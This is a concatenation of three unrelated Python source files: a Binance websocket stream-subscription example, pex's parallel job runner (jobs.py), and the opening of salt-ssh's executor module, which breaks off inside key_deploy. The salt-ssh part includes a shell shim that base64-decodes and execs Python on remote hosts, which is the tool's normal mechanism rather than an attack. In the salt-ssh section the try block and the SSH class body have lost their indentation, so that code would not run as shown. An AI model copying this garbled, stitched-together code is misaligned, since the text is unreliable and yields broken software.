# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
# https://docs.python.org/3/library/logging.html#logging-levels
# Log INFO+ to a file named after this script ("example_subscribe.py.log"),
# using str.format-style ("{") placeholders in the format string.
logging.basicConfig(level=logging.INFO,
                    filename=os.path.basename(__file__) + '.log',
                    format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
                    style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Worker loop that drains the manager's stream_buffer.

    Runs until the manager reports it is stopping. Intended to be the target
    of a worker thread.

    :param binance_websocket_api_manager: the BinanceWebSocketApiManager whose
        stream_buffer should be drained.
    """
    while True:
        if binance_websocket_api_manager.is_manager_stopping():
            # FIX: the original called the interactive-only `exit(0)` builtin,
            # which just raises SystemExit inside this thread; returning ends
            # the worker thread the same way without relying on `site`.
            return
        oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            # Buffer empty (the API returns False, not None); back off briefly
            # to avoid a busy loop.
            time.sleep(0.01)
        else:
            # Intentionally discarded in this example; uncomment to inspect.
            # print(oldest_stream_data_from_stream_buffer)
            pass
# Create the manager for the binance.com exchange; it owns all websocket streams.
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")

# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()

# Example pools of markets/channels (only markets_1/channels_1 are used to
# create the stream below; the rest demonstrate live subscription changes).
markets = ['bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
           'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
           'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
           'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc']
channels = ['trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']

# Start one stream with a small market/channel set ...
markets_1 = ['bnbbtc', 'ethbtc']
channels_1 = ['trade', 'kline_1m', '!ticker']
stream_id = binance_websocket_api_manager.create_stream(channels_1, markets_1)

# ... then demonstrate subscribing additional markets to the running stream.
markets_2 = ['batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
             'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_2)

markets_3 = ['!miniTicker']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_3)

markets_4 = ['engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax', 'xmrusdt',
             'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
             'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
             'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_4)

time.sleep(1)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)

time.sleep(2)
# Unsubscribe most channels again, then poll until the subscription listing
# result (an async request identified by request_id) has arrived.
channels_2 = ['trade', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
binance_websocket_api_manager.unsubscribe_from_stream(stream_id, channels=channels_2)
request_id = binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while binance_websocket_api_manager.get_result_by_request_id(request_id) is False:
    print("Wait to receive the result!")
    time.sleep(0.5)
print(str(binance_websocket_api_manager.get_result_by_request_id(request_id)))

time.sleep(10)
# Monitor loop: print stream info once per second until interrupted.
while True:
    #binance_websocket_api_manager.print_summary()
    binance_websocket_api_manager.print_stream_info(stream_id)
    #binance_websocket_api_manager.get_stream_subscriptions(stream_id)
    time.sleep(1)
|
jobs.py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import errno
from abc import abstractmethod
from collections import namedtuple
from threading import BoundedSemaphore, Event, Thread
from pex.compatibility import AbstractClass, Queue, cpu_count
from pex.tracer import TRACER
class Job(object):
    """Represents a job spawned as a subprocess.

    Presents a similar API to `subprocess` except where noted.
    """

    class Error(Exception):
        """Indicates that a Job exited non-zero."""

        def __init__(self, pid, command, exitcode, stderr, message):
            super(Job.Error, self).__init__(message)
            self.pid = pid
            self.command = command
            self.exitcode = exitcode
            self.stderr = stderr

    def __init__(self, command, process):
        """
        :param command: The command used to spawn the job process.
        :type command: list of str
        :param process: The spawned process handle.
        :type process: :class:`subprocess.Popen`
        """
        self._command = tuple(command)
        self._process = process

    def wait(self):
        """Waits for the job to complete.

        :raises: :class:`Job.Error` if the job exited non-zero.
        """
        self._process.wait()
        self._check_returncode()

    def communicate(self, input=None):
        """Communicates with the job sending any input data to stdin and collecting stdout and
        stderr.

        :param input: Data to send to stdin of the job as per the `subprocess` API.
        :return: A tuple of the job's stdout and stderr as per the `subprocess` API.
        :raises: :class:`Job.Error` if the job exited non-zero.
        """
        stdout, stderr = self._process.communicate(input=input)
        self._check_returncode(stderr)
        return stdout, stderr

    def kill(self):
        """Terminates the job if it is still running.

        N.B.: This method is idempotent.
        """
        try:
            self._process.kill()
        except OSError as e:
            # ESRCH: process already gone, which is fine (idempotence).
            if e.errno != errno.ESRCH:
                # FIX: a bare `raise` re-raises with the original traceback;
                # the original `raise e` re-raised from this frame instead.
                raise

    def _check_returncode(self, stderr=None):
        # Raise Job.Error for a non-zero exit, attaching decoded stderr (when
        # captured) to both the message and the exception attributes.
        if self._process.returncode != 0:
            msg = "Executing {} failed with {}".format(
                " ".join(self._command), self._process.returncode
            )
            if stderr:
                stderr = stderr.decode("utf-8")
                msg += "\nSTDERR:\n{}".format(stderr)
            raise self.Error(
                pid=self._process.pid,
                command=self._command,
                exitcode=self._process.returncode,
                stderr=stderr,
                message=msg,
            )

    def __str__(self):
        return "pid: {pid} -> {command}".format(
            pid=self._process.pid, command=" ".join(self._command)
        )
class SpawnedJob(object):
    """A handle pairing a spawned :class:`Job` with the computation of its result."""

    def __init__(self, job, result_func):
        """Not intended for direct use, see `wait` and `stdout` factories."""
        self._job = job
        self._result_func = result_func

    @classmethod
    def completed(cls, result):
        """Wrap an already completed result in a SpawnedJob.

        The returned job no-ops on `kill` since there is nothing left running.

        :param result: The completed result.
        :return: A spawned job whose result is already complete.
        :rtype: :class:`SpawnedJob`
        """

        class Precomputed(SpawnedJob):
            def __init__(self):
                super(Precomputed, self).__init__(job=None, result_func=lambda: result)

            def kill(self):
                pass

            def __str__(self):
                return "SpawnedJob.completed({})".format(result)

        return Precomputed()

    @classmethod
    def wait(cls, job, result):
        """Wait for the job to complete and hand back a fixed result on success.

        Useful when the job's value is a side effect (a written file, a
        populated directory, etc.).

        :param job: The spawned job.
        :type job: :class:`Job`
        :param result: The fixed success result.
        :rtype: :class:`SpawnedJob`
        """

        def await_and_return():
            job.wait()
            return result

        return cls(job=job, result_func=await_and_return)

    @classmethod
    def stdout(cls, job, result_func, input=None):
        """Wait for the job to complete and derive the result from its stdout.

        :param job: The spawned job.
        :type job: :class:`Job`
        :param result_func: A function mapping the job's collected stdout byte
            string to the desired result.
        :param input: Optional stdin data for the process as per
            `subprocess.Popen.communicate`.
        :rtype: :class:`SpawnedJob`
        """

        def collect_stdout():
            out, _ = job.communicate(input=input)
            return result_func(out)

        return cls(job=job, result_func=collect_stdout)

    def await_result(self):
        """Block until the spawned job completes and return its result."""
        return self._result_func()

    def kill(self):
        """Terminate the spawned job if it has not already completed."""
        self._job.kill()

    def __str__(self):
        return str(self._job)
# If `cpu_count` fails, we default to 2. This is relatively arbitrary, based on what seems to be
# common in CI.
_CPU_COUNT = cpu_count() or 2

# Hard ceiling on parallelism regardless of what a caller requests.
_ABSOLUTE_MAX_JOBS = _CPU_COUNT * 2

DEFAULT_MAX_JOBS = _CPU_COUNT
"""The default maximum number of parallel jobs PEX should use."""
def _sanitize_max_jobs(max_jobs=None):
    """Clamp a requested job count to the allowed range.

    `None` or a non-positive request falls back to DEFAULT_MAX_JOBS; anything
    else is capped at _ABSOLUTE_MAX_JOBS.
    """
    assert max_jobs is None or isinstance(max_jobs, int)
    if max_jobs is not None and max_jobs > 0:
        return min(max_jobs, _ABSOLUTE_MAX_JOBS)
    return DEFAULT_MAX_JOBS
class ErrorHandler(AbstractClass):  # type: ignore[valid-type, misc]
    """Handles errors encountered in the context of spawning and awaiting the result of a `Job`."""

    @classmethod
    def spawn_error_message(cls, item, exception):
        # Human-readable description of a failure to launch the job for `item`.
        return "Failed to spawn a job for {item}: {exception}".format(
            item=item, exception=exception
        )

    @classmethod
    def job_error_message(cls, _item, job_error):
        # Human-readable description of a job that ran but exited non-zero.
        # `_item` is unused here but kept for a uniform signature with
        # handle_job_error implementations.
        return "pid {pid} -> {command} exited with {exitcode} and STDERR:\n{stderr}".format(
            pid=job_error.pid,
            command=" ".join(job_error.command),
            exitcode=job_error.exitcode,
            stderr=job_error.stderr,
        )

    @abstractmethod
    def handle_spawn_error(self, item, exception):
        """Handle an error encountered spawning a job.

        :param item: The item that was the input for the spawned job.
        :param exception: The exception encountered attempting to spawn the job for `item`.
        :type exception: :class:`Exception`
        :returns: A value to represent the failed processing of the item or else `None` to skip
                  processing of the item altogether.
        :raise: To indicate all item processing should be cancelled and the exception raised.
        """

    @abstractmethod
    def handle_job_error(self, item, job_error):
        """Handle a job that exits unsuccessfully.

        :param item: The item that was the input for the spawned job.
        :param job_error: An error capturing the details of the job failure.
        :type job_error: :class:`Job.Error`
        :returns: A value to represent the failed processing of the item or else `None` to skip
                  processing of the item altogether.
        :raise: To indicate all item processing should be cancelled and the exception raised.
        """
class Raise(ErrorHandler):
    """Converts spawn and job failures into exceptions of a caller-chosen type."""

    def __init__(self, raise_type):
        """
        :param raise_type: The type of exception to raise when a `Job` fails.
        :type raise_type: An :class:`Exception` subclass.
        """
        self._raise_type = raise_type

    def handle_spawn_error(self, item, exception):
        message = self.spawn_error_message(item, exception)
        raise self._raise_type(message)

    def handle_job_error(self, item, job_error):
        message = self.job_error_message(item, job_error)
        raise self._raise_type(message)
class Retain(ErrorHandler):
    """Keeps failures as data instead of raising.

    Each failed `Job` yields an (item, error) tuple as its result: for spawn
    failures the error is typically an `OSError`; for a job that exited
    non-zero it is a `Job.Error`.
    """

    def handle_spawn_error(self, item, exception):
        return (item, exception)

    def handle_job_error(self, item, job_error):
        return (item, job_error)
class Log(ErrorHandler):
    """Logs spawn and job failures via TRACER and drops the failed items."""

    def handle_spawn_error(self, item, exception):
        TRACER.log(self.spawn_error_message(item, exception))
        # Returning None skips the failed item entirely.
        return None

    def handle_job_error(self, item, job_error):
        TRACER.log(self.job_error_message(item, job_error))
        # Returning None skips the failed item entirely.
        return None
def execute_parallel(inputs, spawn_func, error_handler=None, max_jobs=None):
    """Execute jobs for the given inputs in parallel.

    :param int max_jobs: The maximum number of parallel jobs to spawn.
    :param inputs: An iterable of the data to parallelize over `spawn_func`.
    :param spawn_func: A function taking a single input and returning a :class:`SpawnedJob`.
    :param error_handler: An optional :class:`ErrorHandler`, defaults to :class:`Log`.
    :returns: An iterator over the spawned job results as they come in.
    :raises: A `raise_type` exception if any individual job errors and `raise_type` is not `None`.
    """
    error_handler = error_handler or Log()
    if not isinstance(error_handler, ErrorHandler):
        raise ValueError(
            "Given error_handler {} of type {}, expected an {}".format(
                error_handler, type(error_handler), ErrorHandler
            )
        )

    size = _sanitize_max_jobs(max_jobs)
    TRACER.log(
        "Spawning a maximum of {} parallel jobs to process:\n {}".format(
            size, "\n ".join(map(str, inputs))
        ),
        V=9,
    )

    # Tagged envelopes put on the spawn queue by the spawner thread.
    class Spawn(namedtuple("Spawn", ["item", "spawned_job"])):
        pass

    class SpawnError(namedtuple("SpawnError", ["item", "error"])):
        pass

    stop = Event()  # Used as a signal to stop spawning further jobs once any one job fails.
    # Backpressure: at most `size` jobs in flight. Acquired by the spawner
    # thread per job, released by the consumer loop below per job consumed.
    job_slots = BoundedSemaphore(value=size)

    done_sentinel = object()
    spawn_queue = Queue()  # Queue[Union[Spawn, SpawnError, Literal[done_sentinel]]]

    def spawn_jobs():
        for item in inputs:
            if stop.is_set():
                break
            job_slots.acquire()
            try:
                result = Spawn(item, spawn_func(item))
            except Exception as e:
                result = SpawnError(item, e)
            finally:
                # Always forward something so the consumer can release the slot.
                spawn_queue.put(result)
        spawn_queue.put(done_sentinel)

    spawner = Thread(name="PEX Parallel Job Spawner", target=spawn_jobs)
    spawner.daemon = True
    spawner.start()

    error = None
    while True:
        spawn_result = spawn_queue.get()

        if spawn_result is done_sentinel:
            # All inputs processed (or spawning was stopped); surface any
            # deferred error now that outstanding jobs were drained.
            if error:
                raise error
            return

        try:
            if isinstance(spawn_result, SpawnError):
                try:
                    result = error_handler.handle_spawn_error(spawn_result.item, spawn_result.error)
                    if result is not None:
                        yield result
                except Exception as e:
                    # Fail fast and proceed to kill all outstanding spawned jobs.
                    stop.set()
                    error = e
            elif (
                error is not None
            ):  # I.E.: `item` is not an exception, but there was a prior exception.
                spawn_result.spawned_job.kill()
            else:
                try:
                    yield spawn_result.spawned_job.await_result()
                except Job.Error as e:
                    try:
                        result = error_handler.handle_job_error(spawn_result.item, e)
                        if result is not None:
                            yield result
                    except Exception as e:
                        # Fail fast and proceed to kill all outstanding spawned jobs.
                        stop.set()
                        error = e
        finally:
            # One slot per consumed envelope, pairing the spawner's acquire.
            job_slots.release()
|
__init__.py | """
Create ssh executor system
"""
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
from salt.template import compile_template
from salt.utils.platform import is_junos, is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"

# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
#   no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
#   no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
#   RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
#   Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
#   Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"

# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
#    interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
#    some constructs are needed to keep it clean.
# NOTE:
#   * SSH_SH_SHIM is generic and can be used to load+exec *any* python
#     script on the target.
#   * SSH_PY_SHIM is in a separate file rather than stuffed in a string
#     in salt/client/ssh/__init__.py - this makes testing *easy* because
#     it can be invoked directly.
#   * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
#     string. This makes the python script "armored" so that it can
#     all be passed in the SSH command and will not need special quoting
#     (which likely would be impossibe to do anyway)
#   * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
#     big (~7.5k). If this proves problematic for an SSH command we
#     might try simply invoking "/bin/sh -s" and passing the formatted
#     SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
#   - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
#   - DEBUG - enable shim debugging (any non-zero string enables)
#   - SUDO - load python and execute as root (any non-zero string enables)
#   - SSH_PY_CODE - base64-encoded python code to execute
#   - SSH_PY_ARGS - arguments to pass to python code

# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
#   python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python

# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
# NOTE: the `s.strip()` below removes per-line leading whitespace, so the
# shim's indentation is cosmetic only; the `{{...}}` doubled braces survive
# the first `.format()` pass and are filled in per-invocation later.
SSH_SH_SHIM = "\n".join(
    [
        s.strip()
        for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
            EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
        ).split(
            "\n"
        )
    ]
)
# Load the python shim payload from disk (skipped on Windows/Junos where the
# /bin/sh shim cannot run anyway).
if not is_windows() and not is_junos():
    shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
    if not os.path.exists(shim_file):
        # On esky builds we only have the .pyc file
        shim_file += "c"
    with salt.utils.files.fopen(shim_file) as ssh_py_shim:
        SSH_PY_SHIM = ssh_py_shim.read()
else:
    SSH_PY_SHIM = None

log = logging.getLogger(__name__)
class SSH:
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
    def __init__(self, opts):
        """Set up the salt-ssh execution system from a master opts dict.

        Resolves the event bus, targets, private key, per-target defaults and
        the salt-thin tarball. Raises SaltSystemExit when no `ssh` binary is
        available and SaltClientError when key generation fails.
        """
        # Flag key: while True, a directly-passed host may still be appended
        # to the flat roster (see _update_roster/_expand_target).
        self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
        pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
        if os.path.exists(pull_sock) and zmq:
            self.event = salt.utils.event.get_event(
                "master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
            )
        else:
            self.event = None
        self.opts = opts
        if self.opts["regen_thin"]:
            # Regenerating thin implies wiping the deployed copy on targets.
            self.opts["ssh_wipe"] = True
        if not salt.utils.path.which("ssh"):
            raise salt.exceptions.SaltSystemExit(
                code=-1,
                msg=(
                    "No ssh binary found in path -- ssh must be installed for salt-ssh"
                    " to run. Exiting."
                ),
            )
        self.opts["_ssh_version"] = ssh_version()
        self.tgt_type = (
            self.opts["selected_target_option"]
            if self.opts["selected_target_option"]
            else "glob"
        )
        self._expand_target()
        self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
        self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
        if not self.targets:
            # Nothing matched the roster: maybe a raw user@host target.
            self._update_targets()
        # If we're in a wfunc, we need to get the ssh key location from the
        # top level opts, stored in __master_opts__
        if "__master_opts__" in self.opts:
            if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
                os.path.expanduser("~/.ssh/id_rsa")
            ):
                priv = os.path.expanduser("~/.ssh/id_rsa")
            else:
                priv = self.opts["__master_opts__"].get(
                    "ssh_priv",
                    os.path.join(
                        self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
                    ),
                )
        else:
            priv = self.opts.get(
                "ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
            )
        # "agent-forwarding" is a sentinel value: no key file is managed.
        if priv != "agent-forwarding":
            if not os.path.isfile(priv):
                try:
                    salt.client.ssh.shell.gen_key(priv)
                except OSError:
                    raise salt.exceptions.SaltClientError(
                        "salt-ssh could not be run because it could not generate"
                        " keys.\n\nYou can probably resolve this by executing this"
                        " script with increased permissions via sudo or by running as"
                        " root.\nYou could also use the '-c' option to supply a"
                        " configuration directory that you have permissions to read and"
                        " write to."
                    )
        # Per-target connection defaults; roster entries override these
        # (see handle_ssh where missing keys are filled in per host).
        self.defaults = {
            "user": self.opts.get(
                "ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
            ),
            "port": self.opts.get(
                "ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
            ),
            "passwd": self.opts.get(
                "ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
            ),
            "priv": priv,
            "priv_passwd": self.opts.get(
                "ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
            ),
            "timeout": self.opts.get(
                "ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
            )
            + self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
            "sudo": self.opts.get(
                "ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
            ),
            "sudo_user": self.opts.get(
                "ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
            ),
            "identities_only": self.opts.get(
                "ssh_identities_only",
                salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
            ),
            "remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
            "ssh_options": self.opts.get("ssh_options"),
        }
        if self.opts.get("rand_thin_dir"):
            self.defaults["thin_dir"] = os.path.join(
                "/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
            )
            self.opts["ssh_wipe"] = "True"
        # NOTE(review): salt.payload and salt.fileclient are not in the visible
        # import block — presumably pulled in transitively; verify at runtime.
        self.serial = salt.payload.Serial(opts)
        self.returners = salt.loader.returners(self.opts, {})
        self.fsclient = salt.fileclient.FSClient(self.opts)
        self.thin = salt.utils.thin.gen_thin(
            self.opts["cachedir"],
            extra_mods=self.opts.get("thin_extra_mods"),
            overwrite=self.opts["regen_thin"],
            python2_bin=self.opts["python2_bin"],
            python3_bin=self.opts["python3_bin"],
            extended_cfg=self.opts.get("ssh_ext_alternatives"),
        )
        self.mods = mod_data(self.fsclient)
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data[host_id].get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
    def _update_roster(self):
        """
        Update default flat roster with the passed in information.
        :return:
        """
        roster_file = self._get_roster()
        if os.access(roster_file, os.W_OK):
            if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
                # Append a YAML entry for the directly-targeted host; the flag
                # is cleared in _expand_target when the host is already known.
                with salt.utils.files.fopen(roster_file, "a") as roster_fp:
                    roster_fp.write(
                        '# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n'
                        " host: {hostname}\n user: {user}\n passwd: {passwd}\n".format(
                            s_user=getpass.getuser(),
                            s_time=datetime.datetime.utcnow().isoformat(),
                            hostname=self.opts.get("tgt", ""),
                            user=self.opts.get("ssh_user", ""),
                            passwd=self.opts.get("ssh_passwd", ""),
                        )
                    )
                log.info(
                    "The host %s has been added to the roster %s",
                    self.opts.get("tgt", ""),
                    roster_file,
                )
        else:
            log.error("Unable to update roster %s: access denied", roster_file)
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hostname = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
    def key_deploy(self, host, ret):
        """
        Deploy the SSH key if the minions don't auth

        :param host: target host id.
        :param ret: the per-host return dict from a previous run attempt.
        :return: `ret`, possibly replaced by the result of a key-deploy run.
        """
        # Non-dict return or forced deploy: push the key without re-running.
        if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
            target = self.targets[host]
            if target.get("passwd", False) or self.opts["ssh_passwd"]:
                self._key_deploy_run(host, target, False)
            return ret
